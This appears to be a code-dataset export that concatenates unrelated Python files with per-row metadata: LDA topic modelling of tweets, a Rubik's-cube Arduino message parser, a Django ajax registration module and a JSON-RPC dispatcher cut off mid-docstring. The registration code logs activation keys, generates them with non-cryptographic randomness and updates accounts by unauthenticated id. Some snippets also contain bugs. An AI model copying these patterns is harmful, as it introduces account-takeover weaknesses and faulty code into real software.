for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'trump_lda.html')
ldamodel.save('trump_model.gensim')
trump_df=df
| en | 0.553853 | #!python -m spacy download en_core_web_lg #Base and Cleaning #Visualizations #Natural Language Processing (NLP) Removes emoji's from tweets Accepts: Text (tweets) Returns: Text (emoji free tweets) Cleans text from urls # Makes tokens column # Instantiating a Base LDA model # Getting the topics # Makes tokens column # Getting the topics | 2.386329 | 2 |
Code python/Pycharm/texte_optimisation.py | Thomaw/Rubik-s-cube-solver | 0 | 6632540 | <filename>Code python/Pycharm/texte_optimisation.py
import re
'''
Cette fonction va nous permettre de simplifier la réception du message Arduino
avant de le transmettre à l'afficheur
Cette fonction ne sera pas expliquée en détail, car c'est simplement une modification longue et sinueuse
du message Arduino ayant pour objectif principal d'enlever les imperfections pour créer quelques choses
de facile à comprendre pour l'utilisateur
'''
def optimisation(liste):
def simplification(txt):
txt = (txt.replace("['", "")).replace("\\n]", "")
txt = txt.replace('"', "")
txt = (txt.replace(',,', ",")).replace("\\r\\n'", '\n')
txt = txt.replace(", '\n,", "\n€")
txt = txt.replace("\n, '", "\n")
txt = (txt.replace(', \\r', '')).replace(', ', '')
txt = txt.replace("'\\r", '')
txt = txt.replace('\\r', '')
txt = ((txt.replace("€'", "")).replace("€ '", "")).replace("€ ", "")
txt = txt.replace('\\n', '\n')
txt = txt[:-1]
txt = txt.replace('Transfert terminé ...\n', '')
return txt
def Convert(alpha):
li = list(alpha.split(" "))
return li
txt = str(liste)
txt2 = Convert(txt)
txt3, txt4 = [], []
for s_list in txt2:
q = (((str(s_list).replace('[', '')).replace(']', '')).replace('(', '')).replace(')', '')
if len(q) > 10:
q = "Solving"
q = re.sub('Face:|Fix|Cross|Instance|1:|2:|3:|Corners|bring|yellow|piece|up:|Done|\'Transfert|finish|'
'Add|Edges|edges|White|Top:|Finish|Face|Green|Right:|Left:|Solving|Cube:|Superflip'
'Cross:|Solved|PLL:|inside|First|Layer|not|Second|Whole|:|last|OLL|The|is', '', q)
if len(q) > 0:
txt3.append(q)
# " CW Rotation: "
# " CCW Rotation: "
mx = len(txt3)
for i in range(0, mx):
if txt3[i] == "B,":
txt3[i] = 'B,'
if len(txt3[i]) == 4 and txt3[i][1] == "B":
txt3[i] = "B'"
if txt3[i] == 'Flip':
if txt3[i + 1] == 'CCW':
# "[Cube Flip: CCW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on F'
# "[Cube Flip: CCW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on U'
elif txt3[i + 1] == 'CW':
# "[Cube Flip: CW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on F'
# "[Cube Flip: CW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on U'
elif (txt3[i] == 'CW' or txt3[i] == 'CCW') and txt3[i + 1] == 'Rotation':
txt3[i] = ''
txt3[i + 1] = ''
for s_list in txt3:
s_list = s_list.replace(',', '')
if len(str(s_list)) > 0 and str(s_list)[0] in 'BCDLURF':
txt4.append(s_list)
del txt4[-1]
return txt4
| <filename>Code python/Pycharm/texte_optimisation.py
import re
'''
Cette fonction va nous permettre de simplifier la réception du message Arduino
avant de le transmettre à l'afficheur
Cette fonction ne sera pas expliquée en détail, car c'est simplement une modification longue et sinueuse
du message Arduino ayant pour objectif principal d'enlever les imperfections pour créer quelques choses
de facile à comprendre pour l'utilisateur
'''
def optimisation(liste):
def simplification(txt):
txt = (txt.replace("['", "")).replace("\\n]", "")
txt = txt.replace('"', "")
txt = (txt.replace(',,', ",")).replace("\\r\\n'", '\n')
txt = txt.replace(", '\n,", "\n€")
txt = txt.replace("\n, '", "\n")
txt = (txt.replace(', \\r', '')).replace(', ', '')
txt = txt.replace("'\\r", '')
txt = txt.replace('\\r', '')
txt = ((txt.replace("€'", "")).replace("€ '", "")).replace("€ ", "")
txt = txt.replace('\\n', '\n')
txt = txt[:-1]
txt = txt.replace('Transfert terminé ...\n', '')
return txt
def Convert(alpha):
li = list(alpha.split(" "))
return li
txt = str(liste)
txt2 = Convert(txt)
txt3, txt4 = [], []
for s_list in txt2:
q = (((str(s_list).replace('[', '')).replace(']', '')).replace('(', '')).replace(')', '')
if len(q) > 10:
q = "Solving"
q = re.sub('Face:|Fix|Cross|Instance|1:|2:|3:|Corners|bring|yellow|piece|up:|Done|\'Transfert|finish|'
'Add|Edges|edges|White|Top:|Finish|Face|Green|Right:|Left:|Solving|Cube:|Superflip'
'Cross:|Solved|PLL:|inside|First|Layer|not|Second|Whole|:|last|OLL|The|is', '', q)
if len(q) > 0:
txt3.append(q)
# " CW Rotation: "
# " CCW Rotation: "
mx = len(txt3)
for i in range(0, mx):
if txt3[i] == "B,":
txt3[i] = 'B,'
if len(txt3[i]) == 4 and txt3[i][1] == "B":
txt3[i] = "B'"
if txt3[i] == 'Flip':
if txt3[i + 1] == 'CCW':
# "[Cube Flip: CCW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on F'
# "[Cube Flip: CCW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CCW on U'
elif txt3[i + 1] == 'CW':
# "[Cube Flip: CW on F]"
if txt3[i + 3] == 'F' or txt3[i + 3] == 'F,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on F'
# "[Cube Flip: CW on U]"
elif txt3[i + 3] == 'U' or txt3[i + 3] == 'U,':
for j in range(i, i + 5):
txt3[j] = ''
txt3[i - 1] = 'CW on U'
elif (txt3[i] == 'CW' or txt3[i] == 'CCW') and txt3[i + 1] == 'Rotation':
txt3[i] = ''
txt3[i + 1] = ''
for s_list in txt3:
s_list = s_list.replace(',', '')
if len(str(s_list)) > 0 and str(s_list)[0] in 'BCDLURF':
txt4.append(s_list)
del txt4[-1]
return txt4
| fr | 0.963574 | Cette fonction va nous permettre de simplifier la réception du message Arduino
avant de le transmettre à l'afficheur
Cette fonction ne sera pas expliquée en détail, car c'est simplement une modification longue et sinueuse
du message Arduino ayant pour objectif principal d'enlever les imperfections pour créer quelques choses
de facile à comprendre pour l'utilisateur # " CW Rotation: " # " CCW Rotation: " # "[Cube Flip: CCW on F]" # "[Cube Flip: CCW on U]" # "[Cube Flip: CW on F]" # "[Cube Flip: CW on U]" | 3.092973 | 3 |
grid_user/ajax.py | topd333/Xlab | 0 | 6632541 | from django.http import HttpResponse, HttpResponseRedirect
import json
from django.core.mail import send_mail
from django.core.exceptions import ObjectDoesNotExist
from string import letters, digits
import random
from random import choice
from django.conf import settings
from grid_user.forms import CreateUserForm
import xlab.settings
from models import TempUser, User
from slipstream.user.account import UserAccount
import logging
from django.shortcuts import render
log = logging.getLogger("[GRID_USER]: ")
def ajax_checkusername(request):
datadict = {}
username = request.POST.get('username', '')
user = User.objects.filter(username=username)
tempuser = TempUser.objects.filter(username=username)
if user or tempuser:
datadict['available'] = False
datadict['username'] = username
else:
datadict['available'] = True
datadict['username'] = username
return HttpResponse(json.dumps(datadict), content_type="text/json")
def ajax_register_user(request):
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
form = CreateUserForm(request.POST)
if form.is_valid():
data = request.POST
email = data['email']
firstname = data['firstname']
lastname = data['lastname']
password = data['password']
username = data['username']
key = ''.join(choice(letters + digits) for i in range(64))
log.info('Key Created: %s' % key)
# Test for existing email / avatar name locally
test = ''
xtest = ''
try:
test = User.objects.get(firstname=firstname, lastname=lastname)
xtest += "Firstname and Lastname exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(email=email)
xtest += " Email exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(username=username)
xtest += " Username exists"
except ObjectDoesNotExist:
pass
x_user = UserAccount(
data['firstname'],
data['lastname'],
data['password'],
data['email'],
)
activation_server = settings.ACCOUNT_SERVER_ADDRESS
account_server = settings.ACCOUNT_SERVER_URL
from_address = settings.ACCOUNT_ADMIN_EMAIL
# Test for existing user on grid
if not x_user.test_account(account_server) or xtest != '':
#if xtest != '':
datadict = {'status': False}
datadict['err_message'] = 'Existing Account Of Same %s: Please register with different credentials'%xtest
return HttpResponse(json.dumps(datadict), content_type="text/json")
# Attempt to create a temporary user
# try:
# tmp_user = TempUser.objects.create_temp_user(
# data['email'], data['firstname'], data['lastname'],
# key, data['password']
# )
tmp_user =""
try:
tmp_user = form.save(commit=False)
tmp_user.activation_key = key
tmp_user.save()
except:
datadict = {'status': False}
datadict['err_message'] = 'Existing Account: Please register with different credentials'
return HttpResponse(json.dumps(datadict), content_type="text/json")
# activate_link = '%s:%s'%(request.META['SERVER_NAME'], request.META['SERVER_PORT'])
send_mail('Account activation link', 'Please use the link to activate your account: %s/activate?key=%s' %
(activation_server, key), from_address, [email])
datadict = {'status': True}
datadict['firstname'] = firstname
datadict['lastname'] = lastname
datadict['email'] = email
datadict['id'] = tmp_user.id
return HttpResponse(json.dumps(datadict), content_type="text/json")
else:
datadict = {'status': False, 'error': form.errors}
return HttpResponse(
content=json.dumps(datadict),
mimetype='application/json'
)
def ajax_accounttype_user(request):
if request.method == 'POST':
lastrid = request.POST['user_id']
user = TempUser.objects.get(id=lastrid)
user.accounttype = "basic membership"
user.save()
return HttpResponse(content_type="text/json", status=200)
def ajax_checkpassword(request):
datadict = {}
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
currentpass = request.POST.get('password', None)
try:
check = request.user.check_password(currentpass)
except:
check = False
if check:
datadict['status'] = True
else:
datadict['status'] = False
return HttpResponse(json.dumps(datadict), content_type="text/json") | from django.http import HttpResponse, HttpResponseRedirect
import json
from django.core.mail import send_mail
from django.core.exceptions import ObjectDoesNotExist
from string import letters, digits
import random
from random import choice
from django.conf import settings
from grid_user.forms import CreateUserForm
import xlab.settings
from models import TempUser, User
from slipstream.user.account import UserAccount
import logging
from django.shortcuts import render
log = logging.getLogger("[GRID_USER]: ")
def ajax_checkusername(request):
datadict = {}
username = request.POST.get('username', '')
user = User.objects.filter(username=username)
tempuser = TempUser.objects.filter(username=username)
if user or tempuser:
datadict['available'] = False
datadict['username'] = username
else:
datadict['available'] = True
datadict['username'] = username
return HttpResponse(json.dumps(datadict), content_type="text/json")
def ajax_register_user(request):
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
form = CreateUserForm(request.POST)
if form.is_valid():
data = request.POST
email = data['email']
firstname = data['firstname']
lastname = data['lastname']
password = data['password']
username = data['username']
key = ''.join(choice(letters + digits) for i in range(64))
log.info('Key Created: %s' % key)
# Test for existing email / avatar name locally
test = ''
xtest = ''
try:
test = User.objects.get(firstname=firstname, lastname=lastname)
xtest += "Firstname and Lastname exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(email=email)
xtest += " Email exists"
except ObjectDoesNotExist:
pass
try:
test = User.objects.get(username=username)
xtest += " Username exists"
except ObjectDoesNotExist:
pass
x_user = UserAccount(
data['firstname'],
data['lastname'],
data['password'],
data['email'],
)
activation_server = settings.ACCOUNT_SERVER_ADDRESS
account_server = settings.ACCOUNT_SERVER_URL
from_address = settings.ACCOUNT_ADMIN_EMAIL
# Test for existing user on grid
if not x_user.test_account(account_server) or xtest != '':
#if xtest != '':
datadict = {'status': False}
datadict['err_message'] = 'Existing Account Of Same %s: Please register with different credentials'%xtest
return HttpResponse(json.dumps(datadict), content_type="text/json")
# Attempt to create a temporary user
# try:
# tmp_user = TempUser.objects.create_temp_user(
# data['email'], data['firstname'], data['lastname'],
# key, data['password']
# )
tmp_user =""
try:
tmp_user = form.save(commit=False)
tmp_user.activation_key = key
tmp_user.save()
except:
datadict = {'status': False}
datadict['err_message'] = 'Existing Account: Please register with different credentials'
return HttpResponse(json.dumps(datadict), content_type="text/json")
# activate_link = '%s:%s'%(request.META['SERVER_NAME'], request.META['SERVER_PORT'])
send_mail('Account activation link', 'Please use the link to activate your account: %s/activate?key=%s' %
(activation_server, key), from_address, [email])
datadict = {'status': True}
datadict['firstname'] = firstname
datadict['lastname'] = lastname
datadict['email'] = email
datadict['id'] = tmp_user.id
return HttpResponse(json.dumps(datadict), content_type="text/json")
else:
datadict = {'status': False, 'error': form.errors}
return HttpResponse(
content=json.dumps(datadict),
mimetype='application/json'
)
def ajax_accounttype_user(request):
if request.method == 'POST':
lastrid = request.POST['user_id']
user = TempUser.objects.get(id=lastrid)
user.accounttype = "basic membership"
user.save()
return HttpResponse(content_type="text/json", status=200)
def ajax_checkpassword(request):
datadict = {}
if not request.is_ajax():
return HttpResponse(content="Invalid Request Method.", status=400)
currentpass = request.POST.get('password', None)
try:
check = request.user.check_password(currentpass)
except:
check = False
if check:
datadict['status'] = True
else:
datadict['status'] = False
return HttpResponse(json.dumps(datadict), content_type="text/json") | en | 0.403739 | # Test for existing email / avatar name locally # Test for existing user on grid #if xtest != '': # Attempt to create a temporary user # try: # tmp_user = TempUser.objects.create_temp_user( # data['email'], data['firstname'], data['lastname'], # key, data['password'] # ) # activate_link = '%s:%s'%(request.META['SERVER_NAME'], request.META['SERVER_PORT']) | 2.11582 | 2 |
OOP/Dog.py | zxg110/PythonGrammer | 0 | 6632542 | <reponame>zxg110/PythonGrammer
from OOP import Animal
class Dog(Animal.Animal):
def __init__(self, name, level, age):
#调用父类的构造函数写法
Animal.__init__(name,level)
self.age = age
dog = Dog('tom',1,23)
print("Dog age:",dog.age,"Dog name:",dog.name)
print(type(dog))
| from OOP import Animal
class Dog(Animal.Animal):
def __init__(self, name, level, age):
#调用父类的构造函数写法
Animal.__init__(name,level)
self.age = age
dog = Dog('tom',1,23)
print("Dog age:",dog.age,"Dog name:",dog.name)
print(type(dog)) | zh | 0.774019 | #调用父类的构造函数写法 | 3.897112 | 4 |
xjsonrpc/server/dispatcher.py | bernhardkaindl/pjrpc | 0 | 6632543 | <filename>xjsonrpc/server/dispatcher.py<gh_stars>0
import asyncio
import functools as ft
import json
import itertools as it
import logging
from typing import Any, Callable, Dict, ItemsView, KeysView, List, Optional, Type, Iterator, Iterable, Union, ValuesView
from typing import cast, TypeVar
import xjsonrpc
from xjsonrpc.common import v20, BatchRequest, BatchResponse, Request, Response, UNSET, UnsetType
from xjsonrpc.server import utils
from . import validators
logger = logging.getLogger(__package__)
default_validator = validators.base.BaseValidator()
lst = List[Any]
dct = Dict[Any, Any]
RpcMethod = Callable[..., Any]
RpcParams = Optional[Union[lst, dct]]
Context = Optional[Any]
class Method:
"""
JSON-RPC method wrapper. Stores method itself and some metainformation.
:param method: method
:param name: method name
:param context: context name
"""
def __init__(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
):
self.method = method
self.name = name or method.__name__
self.context = context
meta = utils.set_meta(method, method_name=self.name, context_name=context)
self.validator, self.validator_args = meta.get('validator', default_validator), meta.get('validator_args', {})
def bind(self, params: RpcParams, context: Context = None,) -> RpcMethod:
method_params = self.validator.validate_method(
self.method, params, exclude=(self.context,) if self.context else (), **self.validator_args
)
if self.context is not None:
method_params[self.context] = context
return ft.partial(self.method, **method_params)
def copy(self, **kwargs: Any) -> "Method":
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return Method(method=self.method, **cls_kwargs)
def __eq__(self, other: Any) -> bool:
# sourcery skip: assign-if-exp, reintroduce-else, swap-if-expression
if not isinstance(other, Method):
return False
return (self.method, self.name, self.context) == (other.method, other.name, other.context)
class ViewMethod(Method):
"""
View method.
:param view_cls: view class
:param name: view class method name
:param context: context name
"""
def __init__(
self,
view_cls: Type['ViewMixin'],
method_name: str,
name: Optional[str] = None,
context: Optional[Any] = None,
):
super().__init__(getattr(view_cls, method_name), name or method_name, context)
self.view_cls = view_cls
self.method_name = method_name
def bind(self, params: RpcParams, context: Optional[Any] = None) -> RpcMethod:
view = self.view_cls(context) if self.context else self.view_cls() # type: ignore
method = getattr(view, self.method_name)
method_params = self.validator.validate_method(method, params, **self.validator_args)
return ft.partial(method, **method_params)
def copy(self, **kwargs: Any) -> 'ViewMethod':
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return ViewMethod(view_cls=self.view_cls, method_name=self.method_name, **cls_kwargs)
class ViewMixin:
"""
Simple class based method handler mixin. Exposes all public methods.
"""
@classmethod
def __methods__(cls) -> Any:
for attr_name in filter(lambda name: not name.startswith('_'), dir(cls)):
attr = getattr(cls, attr_name)
if callable(attr):
yield attr
class MethodRegistry:
"""
Method registry.
:param prefix: method name prefix to be used for naming containing methods
"""
def __init__(self, prefix: Optional[str] = None):
self._prefix = prefix
self._registry: Dict[str, Method] = {}
def __iter__(self) -> Iterator[str]:
"""
Returns registry method iterator.
"""
return iter(self._registry)
def __getitem__(self, item: str) -> Method:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method
:raises: KeyError
"""
return self._registry[item]
def items(self) -> ItemsView[str, Method]:
return self._registry.items()
def keys(self) -> KeysView[str]:
return self._registry.keys()
def values(self) -> ValuesView[Method]:
return self._registry.values()
def get(self, item: str) -> Optional[Method]:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method or `None`
"""
return self._registry.get(item)
def add(
self,
rpc_method: RpcMethod,
name: Optional[str] = None,
context: Context = None,
) -> RpcMethod:
"""
Decorator adding decorated method to the registry.
:param rpc_method: method
:param name: method name to be used instead of `__name__` attribute
:param context: parameter name to be used as an application context
:returns: decorated method or decorator
"""
# https://stackoverflow.com/questions/65588913/mypy-type-annotations-for-a-decorator
t = TypeVar("t", bound=Callable[..., Any])
def decorator(method: t) -> t:
full_name = ".".join(filter(None, (self._prefix, name or method.__name__)))
self.add_methods(Method(method, full_name, context))
return method
return decorator(rpc_method)
def add_methods(self, *methods: Union[RpcMethod, Method]) -> None:
"""
Adds methods to the registry.
:param methods: methods to be added. Each one can be an instance of :py:class:`xjsonrpc.server.Method`
or plain method
"""
for method in methods:
if isinstance(method, Method):
self._add_method(method)
else:
self.add(method)
def view(
self, maybe_view: Optional[Type[ViewMixin]] = None, context: Optional[Any] = None, prefix: Optional[str] = None,
) -> Union[ViewMixin, Callable[..., Any]]:
"""
Methods view decorator.
:param maybe_view: view class instance or `None`
:param context: application context name
:param prefix: view methods prefix
:return: decorator or decorated view
"""
def decorator(view: Type[ViewMixin]) -> Type[ViewMixin]:
for method in view.__methods__():
full_name = '.'.join(filter(None, (self._prefix, prefix, method.__name__)))
self._add_method(ViewMethod(view, method.__name__, full_name, context))
return view
# maybe_view's type depends on the usage of the decorator. It's a View
# if it's used as `@view` but ``None`` if used as `@view()`.
if maybe_view is None:
return decorator
else:
return decorator(maybe_view)
def merge(self, other: 'MethodRegistry') -> None:
"""
Merges two registries.
:param other: registry to be merged in the current one
"""
for name, method in other.items():
if self._prefix:
name = f'{self._prefix}.{name}'
self._add_method(method.copy(name=name))
def _add_method(self, method: Method) -> None:
if method.name in self._registry:
logger.warning(f"method '{method.name}' already registered")
self._registry[method.name] = method
class JSONEncoder(xjsonrpc.JSONEncoder):
"""
Server JSON encoder. All custom server encoders should be inherited from it.
"""
def default(self, o: Any) -> Any:
if isinstance(o, validators.base.ValidationError):
return list(o.args)
return super().default(o)
class BaseDispatcher:
"""
Method dispatcher.
:param request_class: JSON-RPC request class
:param response_class: JSON-RPC response class
:param batch_request: JSON-RPC batch request class
:param batch_response: JSON-RPC batch response class
:param json_loader: request json loader
:param json_dumper: response json dumper
:param json_encoder: response json encoder
:param json_decoder: request json decoder
:param middlewares: request middlewares
:param error_handlers: request error handlers
"""
def __init__(
self,
*,
request_class: Type[Request] = v20.Request,
response_class: Type[Response] = v20.Response,
batch_request: Type[BatchRequest] = v20.BatchRequest,
batch_response: Type[BatchResponse] = v20.BatchResponse,
json_loader: Callable[..., Any] = json.loads,
json_dumper: Callable[..., str] = json.dumps,
json_encoder: Type[JSONEncoder] = JSONEncoder,
json_decoder: Optional[Type[json.JSONDecoder]] = None,
middlewares: Iterable[Callable[..., Any]] = (),
error_handlers: Dict[Union[None, int, Exception], List[Callable[..., Any]]] = {},
):
self._json_loader = json_loader
self._json_dumper = json_dumper
self._json_encoder = json_encoder
self._json_decoder = json_decoder
self._request_class = request_class
self._response_class = response_class
self._batch_request = batch_request
self._batch_response = batch_response
self._middlewares = list(middlewares)
self._error_handlers = error_handlers
self._registry = MethodRegistry()
@property
def registry(self) -> MethodRegistry:
return self._registry
def add(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
) -> None:
"""
Adds method to the registry.
:param method: method
:param name: method name
:param context: application context name
"""
self._registry.add(method, name, context)
def add_methods(self, *methods: Union[MethodRegistry, Method, RpcMethod]) -> None:
"""
Adds methods to the registry.
:param methods: method list. Each method may be an instance of :py:class:`xjsonrpc.server.MethodRegistry`,
:py:class:`xjsonrpc.server.Method` or plain function
"""
for method in methods:
if isinstance(method, MethodRegistry):
self._registry.merge(method)
elif isinstance(method, Method):
self._registry.add_methods(method)
else:
self._registry.add(method)
def view(self, view: Type[ViewMixin]) -> None:
"""
Adds class based view to the registry.
:param view: view to be added
"""
self._registry.view(view)
class Dispatcher(BaseDispatcher):
def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*cast(
BatchResponse,
filter(
lambda resp: resp is not UNSET, (
self._handle_request(request, context)
for request in batch_request
)
)
)
)
else:
request = self._request_class.from_json(request_json)
response = self._handle_request(request, context)
except json.JSONDecodeError as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.ParseError(data=str(e)))
except (xjsonrpc.exceptions.DeserializationError, xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
def _handle_rpc_method(
self, method_name: str, params: Optional[Union[lst, dct]], context: Optional[Any]
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
return bound()
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
class AsyncDispatcher(BaseDispatcher):
"""
Asynchronous method dispatcher.
"""
async def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*filter(
lambda resp: resp is not UNSET, await asyncio.gather(
*(self._handle_request(request, context)
for request in batch_request)
),
)
)
else:
request = self._request_class.from_json(request_json)
response = await self._handle_request(request, context)
if not response or isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
except json.JSONDecodeError as e:
response = self._response_class(
id=None, error=xjsonrpc.exceptions.ParseError(data=str(e))
)
except (xjsonrpc.exceptions.DeserializationError,
xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
async def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return await handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = await handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
async def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = await self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
async def _handle_rpc_method(
self, method_name: str, params: RpcParams, context: Optional[Any],
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
result = bound()
if asyncio.iscoroutine(result):
result = await result
return result
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
| <filename>xjsonrpc/server/dispatcher.py<gh_stars>0
import asyncio
import functools as ft
import json
import itertools as it
import logging
from typing import Any, Callable, Dict, ItemsView, KeysView, List, Optional, Type, Iterator, Iterable, Union, ValuesView
from typing import cast, TypeVar
import xjsonrpc
from xjsonrpc.common import v20, BatchRequest, BatchResponse, Request, Response, UNSET, UnsetType
from xjsonrpc.server import utils
from . import validators
logger = logging.getLogger(__package__)
default_validator = validators.base.BaseValidator()
lst = List[Any]
dct = Dict[Any, Any]
RpcMethod = Callable[..., Any]
RpcParams = Optional[Union[lst, dct]]
Context = Optional[Any]
class Method:
"""
JSON-RPC method wrapper. Stores method itself and some metainformation.
:param method: method
:param name: method name
:param context: context name
"""
def __init__(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
):
self.method = method
self.name = name or method.__name__
self.context = context
meta = utils.set_meta(method, method_name=self.name, context_name=context)
self.validator, self.validator_args = meta.get('validator', default_validator), meta.get('validator_args', {})
def bind(self, params: RpcParams, context: Context = None,) -> RpcMethod:
method_params = self.validator.validate_method(
self.method, params, exclude=(self.context,) if self.context else (), **self.validator_args
)
if self.context is not None:
method_params[self.context] = context
return ft.partial(self.method, **method_params)
def copy(self, **kwargs: Any) -> "Method":
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return Method(method=self.method, **cls_kwargs)
def __eq__(self, other: Any) -> bool:
# sourcery skip: assign-if-exp, reintroduce-else, swap-if-expression
if not isinstance(other, Method):
return False
return (self.method, self.name, self.context) == (other.method, other.name, other.context)
class ViewMethod(Method):
"""
View method.
:param view_cls: view class
:param name: view class method name
:param context: context name
"""
def __init__(
self,
view_cls: Type['ViewMixin'],
method_name: str,
name: Optional[str] = None,
context: Optional[Any] = None,
):
super().__init__(getattr(view_cls, method_name), name or method_name, context)
self.view_cls = view_cls
self.method_name = method_name
def bind(self, params: RpcParams, context: Optional[Any] = None) -> RpcMethod:
view = self.view_cls(context) if self.context else self.view_cls() # type: ignore
method = getattr(view, self.method_name)
method_params = self.validator.validate_method(method, params, **self.validator_args)
return ft.partial(method, **method_params)
def copy(self, **kwargs: Any) -> 'ViewMethod':
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return ViewMethod(view_cls=self.view_cls, method_name=self.method_name, **cls_kwargs)
class ViewMixin:
"""
Simple class based method handler mixin. Exposes all public methods.
